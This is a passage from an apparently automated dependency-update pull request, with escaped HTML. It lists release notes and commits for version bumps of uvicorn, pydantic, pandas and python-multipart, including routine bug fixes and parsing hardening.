href=\"https://redirect.github.com/Kludex/uvicorn/issues/2919\"\u003e#2919\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eTreat \u003ccode\u003efd=0\u003c/code\u003e as a valid file descriptor with reload/workers (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2927\"\u003e#2927\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.46.0 (April 23, 2026)\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eSupport \u003ccode\u003ews_max_size\u003c/code\u003e in \u003ccode\u003ewsproto\u003c/code\u003e implementation (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2915\"\u003e#2915\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSupport \u003ccode\u003ews_ping_interval\u003c/code\u003e and \u003ccode\u003ews_ping_timeout\u003c/code\u003e in \u003ccode\u003ewsproto\u003c/code\u003e implementation (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2916\"\u003e#2916\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUse \u003ccode\u003ebytearray\u003c/code\u003e for incoming WebSocket message buffer in \u003ccode\u003ewebsockets-sansio\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2917\"\u003e#2917\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/uvicorn/commit/73e84e58d7f6b8b3dfd8a9e3e42d716862250f33\"\u003e\u003ccode\u003e73e84e5\u003c/code\u003e\u003c/a\u003e Version 0.48.0 (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2951\"\u003e#2951\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/uvicorn/commit/45ea11690b4a62fa6df339d2b6ee3b8545a418e0\"\u003e\u003ccode\u003e45ea116\u003c/code\u003e\u003c/a\u003e Ignore duplicate forwarding headers in \u003ccode\u003eProxyHeadersMiddleware\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2944\"\u003e#2944\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/uvicorn/commit/dd4394c3cbfd9f27a696a7b08047149690058158\"\u003e\u003ccode\u003edd4394c\u003c/code\u003e\u003c/a\u003e chore(deps): bump idna from 3.11 to 3.15 (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2941\"\u003e#2941\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/uvicorn/commit/abe07818a191cd036dc3824d802d052207e01c7e\"\u003e\u003ccode\u003eabe0781\u003c/code\u003e\u003c/a\u003e Default \u003ccode\u003essl_ciphers\u003c/code\u003e to \u003ccode\u003eNone\u003c/code\u003e and use OpenSSL defaults (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2940\"\u003e#2940\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/uvicorn/commit/479a2c0c89186714f1aac52aecdebebf271395ac\"\u003e\u003ccode\u003e479a2c0\u003c/code\u003e\u003c/a\u003e Version 0.47.0 (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2937\"\u003e#2937\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/uvicorn/commit/89347fd166ebedf98fb3f806ce8ea44e93b1c2b5\"\u003e\u003ccode\u003e89347fd\u003c/code\u003e\u003c/a\u003e Add 7-day cooldown for dependency resolution via uv exclude-newer (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2936\"\u003e#2936\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/uvicorn/commit/767315b38ae509cee9fe8ee9d09f6da920536096\"\u003e\u003ccode\u003e767315b\u003c/code\u003e\u003c/a\u003e Drop unused contents/actions permissions from zizmor workflow (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2935\"\u003e#2935\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/uvicorn/commit/f25ee43e68a9678453cbca99ad96f1a447ff34af\"\u003e\u003ccode\u003ef25ee43\u003c/code\u003e\u003c/a\u003e chore(deps): bump urllib3 from 2.6.3 to 2.7.0 (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2933\"\u003e#2933\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/uvicorn/commit/8782666189a3d36c978de5698620db705659bf44\"\u003e\u003ccode\u003e8782666\u003c/code\u003e\u003c/a\u003e Fix typo in \u003ccode\u003edocs/deployment/index.md\u003c/code\u003e. (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2932\"\u003e#2932\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/uvicorn/commit/ad5ff87c869e8a34e9b04fcd5ca38d65c526893c\"\u003e\u003ccode\u003ead5ff87\u003c/code\u003e\u003c/a\u003e Treat \u003ccode\u003efd=0\u003c/code\u003e as a valid file descriptor with reload/workers (\u003ca href=\"https://redirect.github.com/Kludex/uvicorn/issues/2927\"\u003e#2927\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/Kludex/uvicorn/compare/0.45.0...0.48.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `pydantic` from 2.13.3 to 2.13.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pydantic/pydantic/releases\"\u003epydantic's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.13.4 2026-05-06\u003c/h2\u003e\n\u003ch2\u003ev2.13.4 (2026-05-06)\u003c/h2\u003e\n\u003ch3\u003eWhat's Changed\u003c/h3\u003e\n\u003ch4\u003ePackaging\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eBump libc from 0.2.155 to 0.2.185 by \u003ca href=\"https://github.com/Viicos\"\u003e\u003ccode\u003e@​Viicos\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic/pull/13109\"\u003e#13109\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdapt \u003ccode\u003epydantic-core\u003c/code\u003e linker flags on macOS by \u003ca href=\"https://github.com/washingtoneg\"\u003e\u003ccode\u003e@​washingtoneg\u003c/code\u003e\u003c/a\u003e and \u003ca href=\"https://github.com/Viicos\"\u003e\u003ccode\u003e@​Viicos\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic/pull/13147\"\u003e#13147\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eFixes\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003ePreserve \u003ccode\u003eRootModel\u003c/code\u003e core metadata by \u003ca href=\"https://github.com/Viicos\"\u003e\u003ccode\u003e@​Viicos\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic/pull/13129\"\u003e#13129\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/pydantic/pydantic/compare/v2.13.3...v2.13.4\"\u003ehttps://github.com/pydantic/pydantic/compare/v2.13.3...v2.13.4\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pydantic/pydantic/blob/main/HISTORY.md\"\u003epydantic's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.13.4 (2026-05-06)\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/pydantic/pydantic/releases/tag/v2.13.4\"\u003eGitHub release\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eWhat's Changed\u003c/h3\u003e\n\u003ch4\u003ePackaging\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eBump libc from 0.2.155 to 0.2.185 by \u003ca href=\"https://github.com/Viicos\"\u003e\u003ccode\u003e@​Viicos\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic/pull/13109\"\u003e#13109\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdapt \u003ccode\u003epydantic-core\u003c/code\u003e linker flags on macOS by \u003ca href=\"https://github.com/washingtoneg\"\u003e\u003ccode\u003e@​washingtoneg\u003c/code\u003e\u003c/a\u003e and \u003ca href=\"https://github.com/Viicos\"\u003e\u003ccode\u003e@​Viicos\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic/pull/13147\"\u003e#13147\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eFixes\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003ePreserve \u003ccode\u003eRootModel\u003c/code\u003e core metadata by \u003ca href=\"https://github.com/Viicos\"\u003e\u003ccode\u003e@​Viicos\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic/pull/13129\"\u003e#13129\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic/commit/cf67d4b3193c3fe43ede18612ed62785eee11382\"\u003e\u003ccode\u003ecf67d4b\u003c/code\u003e\u003c/a\u003e Fix linting\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic/commit/f0d8a214a5803036db46a56b1f62f1e56b81d662\"\u003e\u003ccode\u003ef0d8a21\u003c/code\u003e\u003c/a\u003e Prepare release v2.13.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic/commit/5e3fe1d41a00f441204241c66078003ae0391f9a\"\u003e\u003ccode\u003e5e3fe1d\u003c/code\u003e\u003c/a\u003e Check for pydantic tag pattern in CI\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic/commit/7f9edcc2a191d2eaa9751220eb910914e716a686\"\u003e\u003ccode\u003e7f9edcc\u003c/code\u003e\u003c/a\u003e Document tagging conventions\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic/commit/b46a0c9b8a4dd967fda8ec1a92f6437076bf262c\"\u003e\u003ccode\u003eb46a0c9\u003c/code\u003e\u003c/a\u003e Adapt \u003ccode\u003epydantic-core\u003c/code\u003e linker flags on macOS\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic/commit/50629c851e61d887d5420452c311ec6203f1f400\"\u003e\u003ccode\u003e50629c8\u003c/code\u003e\u003c/a\u003e Update to PyPy 7.3.22\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic/commit/8522ebb71e5e9a6f7188af5f009f01785b8cf725\"\u003e\u003ccode\u003e8522ebb\u003c/code\u003e\u003c/a\u003e Preserve \u003ccode\u003eRootModel\u003c/code\u003e core metadata\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic/commit/a37f3aff090ca342dc5f48304889963530b993f8\"\u003e\u003ccode\u003ea37f3af\u003c/code\u003e\u003c/a\u003e Adapt \u003ccode\u003eMISSING\u003c/code\u003e sentinel test to work with unreleased \u003ccode\u003etyping_extensions\u003c/code\u003e ver...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic/commit/909259a9df660518033aa686b689f045a6eaf9d2\"\u003e\u003ccode\u003e909259a\u003c/code\u003e\u003c/a\u003e Remove Logfire example in documentation\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic/commit/2c4174c366606fc2dc46cb806833a080aefa77df\"\u003e\u003ccode\u003e2c4174c\u003c/code\u003e\u003c/a\u003e Bump libc from 0.2.155 to 0.2.185\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/pydantic/pydantic/compare/v2.13.3...v2.13.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `pandas` from 3.0.2 to 3.0.3\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pandas-dev/pandas/releases\"\u003epandas's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003epandas 3.0.3\u003c/h2\u003e\n\u003cp\u003eWe are pleased to announce the release of pandas 3.0.3.\nThis is a patch release in the 3.0.x series and includes some regression fixes and bug fixes. We recommend that all users of the 3.0.x series upgrade to this version.\u003c/p\u003e\n\u003cp\u003eSee the \u003ca href=\"https://pandas.pydata.org/docs/whatsnew/v3.0.3.html\"\u003efull whatsnew\u003c/a\u003e for a list of all the changes.\u003c/p\u003e\n\u003cp\u003ePandas 3.0 supports Python 3.11 and higher.\nThe release can be installed from PyPI:\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003epython -m pip install --upgrade pandas==3.0.*\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003eOr from conda-forge\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003econda install -c conda-forge pandas=3.0\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003ePlease report any issues with the release on the \u003ca href=\"https://github.com/pandas-dev/pandas/issues\"\u003epandas issue tracker\u003c/a\u003e.\u003c/p\u003e\n\u003cp\u003eThanks to all the contributors who made this release possible.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pandas-dev/pandas/commit/72f2fea91530b5abb3cf2100cb22d84e504695c0\"\u003e\u003ccode\u003e72f2fea\u003c/code\u003e\u003c/a\u003e RLS: 3.0.3 (\u003ca href=\"https://redirect.github.com/pandas-dev/pandas/issues/65590\"\u003e#65590\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pandas-dev/pandas/commit/2897590094c2b6e3962d01a82665936f30be563d\"\u003e\u003ccode\u003e2897590\u003c/code\u003e\u003c/a\u003e Backport PR \u003ca href=\"https://redirect.github.com/pandas-dev/pandas/issues/65436\"\u003e#65436\u003c/a\u003e on branch 3.0.x (Account for privatization of matplotlib `...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pandas-dev/pandas/commit/49894b5b6037c50f6444504070d9b1e8e514001a\"\u003e\u003ccode\u003e49894b5\u003c/code\u003e\u003c/a\u003e Backport PR \u003ca href=\"https://redirect.github.com/pandas-dev/pandas/issues/65499\"\u003e#65499\u003c/a\u003e on branch 3.0.x (BUG: fix check if pyarrow is installed in...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pandas-dev/pandas/commit/1c6d1e30cc4b80bedb769a8b3731b0788f69c9dc\"\u003e\u003ccode\u003e1c6d1e3\u003c/code\u003e\u003c/a\u003e [backport 3.0.x] PERF: remove special casing for zoneinfo in tz_localize_to_u...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pandas-dev/pandas/commit/2a547116afc46d88d4e6584670fd793949222a1e\"\u003e\u003ccode\u003e2a54711\u003c/code\u003e\u003c/a\u003e Backport PR \u003ca href=\"https://redirect.github.com/pandas-dev/pandas/issues/64379\"\u003e#64379\u003c/a\u003e on branch 3.0.x (PERF: improve performance with ZoneInfo t...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pandas-dev/pandas/commit/036bb7c0e7160b9d5a7f6bd26a9fc00921fa6977\"\u003e\u003ccode\u003e036bb7c\u003c/code\u003e\u003c/a\u003e Backport PR \u003ca href=\"https://redirect.github.com/pandas-dev/pandas/issues/65482\"\u003e#65482\u003c/a\u003e on branch 3.0.x (PERF: don't call unique on dtypes for che...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pandas-dev/pandas/commit/bf4c182b09251f5b469e8e246ae3ea3e1ae07164\"\u003e\u003ccode\u003ebf4c182\u003c/code\u003e\u003c/a\u003e Backport PR \u003ca href=\"https://redirect.github.com/pandas-dev/pandas/issues/65410\"\u003e#65410\u003c/a\u003e on branch 3.0.x (TST: also convert str index to object in ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pandas-dev/pandas/commit/dd02d75ce219135f9f3f65c13644d4be35585d42\"\u003e\u003ccode\u003edd02d75\u003c/code\u003e\u003c/a\u003e [backport 3.0.x] BUG: keep fsspec OpenFile alive for chained URL reads (\u003ca href=\"https://redirect.github.com/pandas-dev/pandas/issues/6547\"\u003e#6547\u003c/a\u003e...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pandas-dev/pandas/commit/aef3d0f6698667262c6d6ffc69180b280b0fa86a\"\u003e\u003ccode\u003eaef3d0f\u003c/code\u003e\u003c/a\u003e [backport 3.0.x] CI: lowercase types-pymysql/types-pyyaml to fix mamba 2.6.0 ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pandas-dev/pandas/commit/bb8e24876273a14322047f4b89e648f6a4abebae\"\u003e\u003ccode\u003ebb8e248\u003c/code\u003e\u003c/a\u003e Backport PR \u003ca href=\"https://redirect.github.com/pandas-dev/pandas/issues/65399\"\u003e#65399\u003c/a\u003e on branch 3.0.x (DOC: fix source link for classes in the r...\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pandas-dev/pandas/compare/v3.0.2...v3.0.3\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `python-multipart` from 0.0.26 to 0.0.30\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/Kludex/python-multipart/releases\"\u003epython-multipart's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 0.0.30\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eTreat only \u003ccode\u003e\u0026amp;\u003c/code\u003e as the urlencoded field separator by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/290\"\u003eKludex/python-multipart#290\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eIgnore RFC 2231 extended parameters in \u003ccode\u003eparse_options_header\u003c/code\u003e by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/291\"\u003eKludex/python-multipart#291\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/Kludex/python-multipart/compare/0.0.29...0.0.30\"\u003ehttps://github.com/Kludex/python-multipart/compare/0.0.29...0.0.30\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eVersion 0.0.29\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eHandle malformed RFC 2231 continuations in \u003ccode\u003eparse_options_header\u003c/code\u003e by \u003ca href=\"https://github.com/manunio\"\u003e\u003ccode\u003e@​manunio\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/270\"\u003eKludex/python-multipart#270\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/Kludex/python-multipart/compare/0.0.28...0.0.29\"\u003ehttps://github.com/Kludex/python-multipart/compare/0.0.28...0.0.29\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eVersion 0.0.28\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSpeed up partial-boundary tail scan via \u003ccode\u003ebytes.find\u003c/code\u003e by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/281\"\u003eKludex/python-multipart#281\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eCap multipart boundary length at 256 bytes by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/282\"\u003eKludex/python-multipart#282\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/Kludex/python-multipart/compare/0.0.27...0.0.28\"\u003ehttps://github.com/Kludex/python-multipart/compare/0.0.27...0.0.28\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eVersion 0.0.27\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ePass parse offsets via constructors by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/268\"\u003eKludex/python-multipart#268\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd multipart header limits by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/267\"\u003eKludex/python-multipart#267\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/Kludex/python-multipart/compare/0.0.26...0.0.27\"\u003ehttps://github.com/Kludex/python-multipart/compare/0.0.26...0.0.27\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/Kludex/python-multipart/blob/main/CHANGELOG.md\"\u003epython-multipart's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.0.30 (2026-05-31)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eParse \u003ccode\u003eapplication/x-www-form-urlencoded\u003c/code\u003e bodies per the WHATWG URL standard, treating only \u003ccode\u003e\u0026amp;\u003c/code\u003e as a field separator \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/290\"\u003e#290\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eIgnore RFC 2231/5987 extended parameters (\u003ccode\u003ename*\u003c/code\u003e, \u003ccode\u003efilename*\u003c/code\u003e) in \u003ccode\u003eparse_options_header\u003c/code\u003e, keeping the plain parameter authoritative per \u003ca href=\"https://datatracker.ietf.org/doc/html/rfc7578#section-4.2\"\u003eRFC 7578 §4.2\u003c/a\u003e \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/291\"\u003e#291\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.0.29 (2026-05-17)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eHandle malformed RFC 2231 continuations in \u003ccode\u003eparse_options_header\u003c/code\u003e \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/270\"\u003e#270\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.0.28 (2026-05-10)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSpeed up partial-boundary tail scan via \u003ccode\u003ebytes.find\u003c/code\u003e \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/281\"\u003e#281\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eCap multipart boundary length at 256 bytes \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/282\"\u003e#282\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.0.27 (2026-04-27)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd multipart header limits \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/267\"\u003e#267\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003ePass parse offsets via constructors \u003ca href=\"https://redirect.github.com/Kludex/python-multipart/pull/268\"\u003e#268\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/python-multipart/commit/9d3ead568a259f222cff6425262ff63e88d930d4\"\u003e\u003ccode\u003e9d3ead5\u003c/code\u003e\u003c/a\u003e Version 0.0.30 (\u003ca href=\"https://redirect.github.com/Kludex/python-multipart/issues/292\"\u003e#292\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/python-multipart/commit/3506c15ce99cb62faf2d5ceb3c4c1e5800cb843d\"\u003e\u003ccode\u003e3506c15\u003c/code\u003e\u003c/a\u003e Ignore RFC 2231 extended parameters in \u003ccode\u003eparse_options_header\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/Kludex/python-multipart/issues/291\"\u003e#291\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/python-multipart/commit/d69df35cd2cad9c72794c2c340db646afae957d8\"\u003e\u003ccode\u003ed69df35\u003c/code\u003e\u003c/a\u003e Treat only \u003ccode\u003e\u0026amp;\u003c/code\u003e as the urlencoded field separator (\u003ca href=\"https://redirect.github.com/Kludex/python-multipart/issues/290\"\u003e#290\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/python-multipart/commit/1e6ff9740b09fb439755f30e2b0e2ada1d297325\"\u003e\u003ccode\u003e1e6ff97\u003c/code\u003e\u003c/a\u003e Bump idna from 3.11 to 3.15 (\u003ca href=\"https://redirect.github.com/Kludex/python-multipart/issues/289\"\u003e#289\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/python-multipart/commit/e3d6853978b91b77e9739d47389124d633894c39\"\u003e\u003ccode\u003ee3d6853\u003c/code\u003e\u003c/a\u003e Version 0.0.29 (\u003ca href=\"https://redirect.github.com/Kludex/python-multipart/issues/288\"\u003e#288\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/python-multipart/commit/a60dcdcb34d55b396ced6f5bdb1d1e6df84832ae\"\u003e\u003ccode\u003ea60dcdc\u003c/code\u003e\u003c/a\u003e Handle malformed RFC 2231 continuations in \u003ccode\u003eparse_options_header\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/Kludex/python-multipart/issues/270\"\u003e#270\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/python-multipart/commit/75c33b24d91f1e3c65b597832984d6c46d1a38df\"\u003e\u003ccode\u003e75c33b2\u003c/code\u003e\u003c/a\u003e Add 7-day cooldown for dependency resolution via uv exclude-newer (\u003ca href=\"https://redirect.github.com/Kludex/python-multipart/issues/286\"\u003e#286\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/python-multipart/commit/a078b8ef00474c3f3a6cf750cd092cf880354a11\"\u003e\u003ccode\u003ea078b8e\u003c/code\u003e\u003c/a\u003e Bump urllib3 from 2.6.3 to 2.7.0 (\u003ca href=\"https://redirect.github.com/Kludex/python-multipart/issues/285\"\u003e#285\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Kludex/python-multipart/commit/7d8d28b210ac6cb055399562b0dc0e5cf9aef14a\"\u003e\u003ccode\u003e7d8d28b\u003c/code\u003e\u003c/a\u003e Version 0.0.28 (\u003ca 